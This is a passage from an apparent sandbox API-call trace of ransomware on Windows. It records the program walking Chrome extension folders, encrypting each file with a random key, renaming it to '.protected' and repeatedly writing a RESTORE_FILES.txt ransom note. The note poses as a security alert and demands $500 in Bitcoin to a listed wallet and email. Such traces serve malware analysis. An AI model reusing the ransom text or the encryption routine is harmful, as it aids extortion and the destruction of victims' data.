service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.279] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.280] lstrlenA (lpString="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") returned 684 [0079.280] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.280] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.280] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.280] CloseHandle (hObject=0x164) returned 1 [0079.280] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Windows") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Program Files") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Program Files (x86)") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="$Recycle.bin") returned 1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="System Volume Information") returned -1 [0079.280] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu") returned 142 [0079.280] lstrcmpW (lpString1="eu", lpString2=".") returned 1 [0079.280] lstrcmpW (lpString1="eu", lpString2="..") returned 1 [0079.280] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*") returned 144 [0079.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.281] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\.") returned 144 [0079.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.281] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.281] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\..") returned 145 [0079.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.281] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.281] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.282] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.282] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.282] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.322] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.322] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.323] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.323] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.323] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.324] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.324] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.324] CloseHandle (hObject=0x168) returned 1 [0079.324] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected") returned 166 [0079.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json.protected")) returned 1 [0079.325] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.325] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.325] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\RESTORE_FILES.txt") returned 160 [0079.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.326] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.326] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.327] lstrlenA (lpString="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") returned 684 [0079.327] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.327] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.327] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.327] CloseHandle (hObject=0x164) returned 1 [0079.327] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0079.327] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0079.327] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi") returned 142 [0079.327] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0079.327] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*") returned 144 [0079.328] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.328] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.328] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\.") returned 144 [0079.328] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.328] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.328] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\..") returned 145 [0079.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.328] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") 
returned -1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.328] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.328] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.328] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.329] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.329] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json") returned 156 [0079.329] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.329] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.330] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.330] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0079.330] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.331] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.331] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.331] CloseHandle (hObject=0x168) returned 1 [0079.331] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected") returned 166 [0079.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0079.332] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.332] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.332] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 160 [0079.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.332] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.332] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.333] lstrlenA (lpString="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") returned 684 [0079.333] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.333] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.333] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.333] CloseHandle (hObject=0x164) returned 1 [0079.334] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0079.334] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0079.334] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil") returned 143 [0079.334] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0079.334] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0079.334] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*") returned 145 [0079.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
